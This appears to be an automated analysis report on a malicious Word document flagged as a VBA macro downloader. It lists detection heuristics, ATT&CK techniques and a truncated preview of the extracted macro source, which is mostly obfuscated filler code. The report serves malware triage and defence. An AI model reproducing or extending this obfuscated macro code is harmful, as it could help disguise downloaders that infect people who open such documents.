MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The file is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes CreateObject. ClamAV identifies it as 'Doc.Macro.VBSDownloader-6336817-0', strongly suggesting its purpose is to download and execute a secondary payload. The presence of the AutoOpen macro and the CreateObject call are common indicators of macro-based malware downloaders.
Heuristics 7
-
ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17564 bytes |
SHA-256: f3fc4bb77d37012e29a046383f28e43b7caa65a413fa2d2e76cf9ce8a7e8d963 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function ArsRSUh() spWywkz = 4192 Dim FFXgwCLyNSr(4192) FFXgwCLyNSr(1697) = CPGBgXZNW FFXgwCLyNSr(3200) = RLvCbFuMD FFXgwCLyNSr(1106) = BapYEBNPvSe FFXgwCLyNSr(1820) = FwXgusde FFXgwCLyNSr(3192) = XdfgDef FFXgwCLyNSr(1131) = EvkUcWdkaHM FFXgwCLyNSr(1568) = kVrhuCvENVm FFXgwCLyNSr(2197) = LYWmmsSGF FFXgwCLyNSr(295) = sMBwPUPk FFXgwCLyNSr(869) = ytSgAfDUN FFXgwCLyNSr(1817) = CapSUdZMHHN FFXgwCLyNSr(209) = wnCNmEKRuA FFXgwCLyNSr(1243) = FdcrSNCpxNH FFXgwCLyNSr(1964) = ggRrAAf FFXgwCLyNSr(2670) = cKHpkafXVUP FFXgwCLyNSr(2985) = uNCmLXadFR FFXgwCLyNSr(463) = kCgEctbLY FFXgwCLyNSr(1679) = SgxmKfyAWA FFXgwCLyNSr(271) = kkTeWVwK gVaHPrb = "gezdcbnS" ANSgrXe = "KGctbmeX" HYyKpGMvbP = "kgMGbykYND" dPDFnrxRSK = "nCmYbKFerG" dWZUvMgpFwT = "yNwRBanwh" FyDStNGHz = "xgBYPnY" GGxxfSk = "ZPhSBATcWeU" xKkyBhFD = "szysuwxMP" XpGGFrsm = "zaFnrypuSc" sAXcxVLaUW = "VauFGTskCA" kxbNSUn = "kfdLfhD" vmHHrDZCM = "KbwBGSLAE" GnDGvNyVW = "aHTbDxkC" FewPRsZpD = "eUCMFUm" eBuyzWaDTC = "tbSuahmbF" PzxRmXeWXSD = "psNtZmgkG" VEfYrsrKb = "MhBZTYKv" exPeDdNxGFn = "WXWyvPaVG" rhYEKFdfkED = "mGtzreFNb" End Function Function tzxrKeRTGk() sbDEnMMud = 172 Dim dHyuPCmXC(172) dHyuPCmXC(119) = DNpkWNWf dHyuPCmXC(83) = PMyzcYYfdF dHyuPCmXC(127) = tKbEdPpTcx dHyuPCmXC(69) = cnhhWGays dHyuPCmXC(116) = hmrNByr dHyuPCmXC(129) = htfpdchT dHyuPCmXC(157) = ceCvYrbb dHyuPCmXC(79) = HAfawMZcrKE dHyuPCmXC(143) = GNZXVRsU dHyuPCmXC(117) = pcuyfRbu dHyuPCmXC(143) = fDvzKKbepGC dHyuPCmXC(84) = DVNzEccsmm dHyuPCmXC(94) = AhUapxvMNv dHyuPCmXC(159) = sDdBwKCXswp dHyuPCmXC(155) = zFfkLUkPZ dHyuPCmXC(123) = nyVEsHwRr dHyuPCmXC(144) = DrRCfLCXdnr dHyuPCmXC(131) = vxTbhbyddAw dHyuPCmXC(139) = eayCykzZAG TFvvezWgKN = "yWGDNXWX" WKDSaBLzny = "TybTDWS" zknMhEtgx = "gShyUPHrvp" SmhGRMupW = "hRxGDVx" PxbeRkuFLC = "xCWCvWR" DnMyZKaPUN = "MLDaKpY" UubTwxgpE = "GEuPNgGXwc" pBMAaWGDk = "pNNHwUkryb" GHWyAzLrDKH = "byHsaLpS" umNUPVvVmyF = "CBVhVHk" wPKzgdmkbPR = "rGMeCnpWkg" XunhGsUm = "AXfHcemKcf" wTLTtNvPY = "GADrXSyvH" treNbfhS = "vbcbSEbF" chwyyDZA = "yUBesphfnS" chTbHftdBW = "xZXdTYaRd" MffpEattm = "kEuerYnY" LcWVHaMcxV = "DsTbAXvZ" End Function Function ybeLHvC() fUsUGBdbcdc = 4338 Dim ehYFMLyaGMg(4338) ehYFMLyaGMg(1954) = ngHSRADvtgZ ehYFMLyaGMg(500) = SbwysDyp ehYFMLyaGMg(2579) = MPrPakMrNV ehYFMLyaGMg(2578) = frYGGkcM ehYFMLyaGMg(845) = FYcdFeS ehYFMLyaGMg(1674) = tMHZFMyb ehYFMLyaGMg(1724) = bgSZbLGuDZ ehYFMLyaGMg(2344) = HMhLhUwxUP ehYFMLyaGMg(138) = esadmpDS ehYFMLyaGMg(888) = ZxvDPkNAA ehYFMLyaGMg(3687) = hDfrPff ehYFMLyaGMg(3503) = skyBWxyAZ ehYFMLyaGMg(3805) = KRXAdywBpax ehYFMLyaGMg(1223) = FxwfcpDhpd ehYFMLyaGMg(115) = VHLYaGk ehYFMLyaGMg(2894) = XhMGDVpNWDW ehYFMLyaGMg(4128) = RnwdVUuHy ehYFMLyaGMg(4165) = vsrfxNAVuE ehYFMLyaGMg(1343) = DtWnpEh ehYFMLyaGMg(3267) = pUpnPEazNh ehYFMLyaGMg(1723) = TrVANtWgPZ ehYFMLyaGMg(2640) = bdPCahPaeV ehYFMLyaGMg(926) = fKTkaUBBAkp zufAfeM = "vkLfPRRY" vfxsxbKbFm = "SydUyKg" zbTeTUzLBTR = "MdpLbyr" ykcfeZTUps = "AABEpEC" NHMHrZK = "zypsKyM" ZavGWrTnx = "VLeuFGDkD" hkABzpFSYS = "TSygKSkp" fkvmAaBt = "nSsbEYFgZtE" LXXZBeyANfS = "NYcbRZgN" cwUTLeMp = "TmruTgnC" htdzXEGp = "WffPpsTZh" aSEHUBDnxy = "wsybhpUa" End Function Function RcVNnmMGBV() tbzZXvdDt = 3677 Dim HFAbKggU(3677) HFAbKggU(2412) = GaMezczDDU HFAbKggU(964) = YMSfUGNs HFAbKggU(3491) = KBzsHesms HFAbKggU(748) = fhXSBZGTHuX HFAbKggU(3431) = UTsxWkwwzV HFAbKggU(3426) = nyFZuPwv HFAbKggU(508) = wKecbXNSe HFAbKggU(93) = fkdhadDA HFAbKggU(1806) = ftcZvtku HFAbKggU(3237) = LkLNNngzkdC HFAbKggU(2571) = aNKdytR HFAbKggU(2031) = ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.